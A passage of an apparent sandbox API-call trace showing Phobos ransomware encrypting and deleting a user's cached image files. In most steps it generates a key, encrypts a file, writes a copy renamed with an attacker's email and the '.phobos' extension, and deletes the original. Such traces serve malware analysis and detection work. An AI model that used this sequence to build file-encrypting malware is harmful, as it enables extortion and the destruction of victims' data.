Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbienj[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.395] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.395] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbienj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.396] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.396] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.396] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1f19, lpOverlapped=0x0) returned 1 [0177.399] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1f20, dwBufLen=0x1f20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1f20) returned 1 [0177.399] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1f20, lpOverlapped=0x0) returned 1 [0177.400] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0177.400] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.400] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.400] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.400] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.400] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.400] CloseHandle (hObject=0x17c) returned 1 [0177.400] CloseHandle (hObject=0x15c) returned 1 [0177.400] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBIeNJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbienj[1].jpg")) returned 1 [0177.401] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbl4r9[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.406] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=9577) returned 1 [0177.406] CloseHandle (hObject=0x15c) returned 1 [0177.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbl4r9[1].jpg")) returned 0x2020 [0177.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbl4r9[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbl4r9[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.407] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.407] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbl4r9[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.407] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.407] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.407] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2569, lpOverlapped=0x0) returned 1 [0177.414] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2570, dwBufLen=0x2570 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2570) returned 1 [0177.414] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2570, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2570, lpOverlapped=0x0) returned 1 [0177.421] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0177.421] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.422] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.422] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.422] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.422] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.422] CloseHandle (hObject=0x15c) returned 1 [0177.422] CloseHandle (hObject=0x17c) returned 1 [0177.422] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBL4R9[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbl4r9[1].jpg")) returned 1 [0177.423] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbphar[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.423] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=18676) returned 1 [0177.423] CloseHandle (hObject=0x17c) returned 1 [0177.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbphar[1].jpg")) returned 0x2020 [0177.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbphar[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbphar[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.423] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.423] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbphar[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.424] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.424] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.424] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x48f4, lpOverlapped=0x0) returned 1 [0177.450] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4900, dwBufLen=0x4900 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4900) returned 1 [0177.450] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4900, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4900, lpOverlapped=0x0) returned 1 [0177.452] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0177.453] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.453] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.453] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.453] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.454] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.454] CloseHandle (hObject=0x17c) returned 1 [0177.454] CloseHandle (hObject=0x15c) returned 1 [0177.454] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPhAr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbphar[1].jpg")) returned 1 [0177.455] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpmxj[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.456] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5823) returned 1 [0177.456] CloseHandle (hObject=0x15c) returned 1 [0177.456] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpmxj[1].jpg")) returned 0x2020 [0177.456] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpmxj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpmxj[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.456] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.456] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpmxj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.457] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.457] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.457] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x16bf, lpOverlapped=0x0) returned 1 [0177.464] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16c0, dwBufLen=0x16c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16c0) returned 1 [0177.464] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x16c0, lpOverlapped=0x0) returned 1 [0177.465] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0177.465] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.465] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.465] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.465] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.465] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.465] CloseHandle (hObject=0x15c) returned 1 [0177.466] CloseHandle (hObject=0x17c) returned 1 [0177.466] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPmXJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbpmxj[1].jpg")) returned 1 [0177.466] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbps37[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.467] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=139243) returned 1 [0177.467] CloseHandle (hObject=0x17c) returned 1 [0177.467] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbps37[1].png")) returned 0x2020 [0177.467] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbps37[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbps37[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.467] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.467] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbps37[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.468] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.468] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.468] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x21feb, lpOverlapped=0x0) returned 1 [0177.480] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x21ff0, dwBufLen=0x21ff0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x21ff0) returned 1 [0177.481] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x21ff0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x21ff0, lpOverlapped=0x0) returned 1 [0177.484] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0177.484] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.484] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.484] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.484] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.484] CryptDestroyKey (hKey=0xa32d68) returned 1 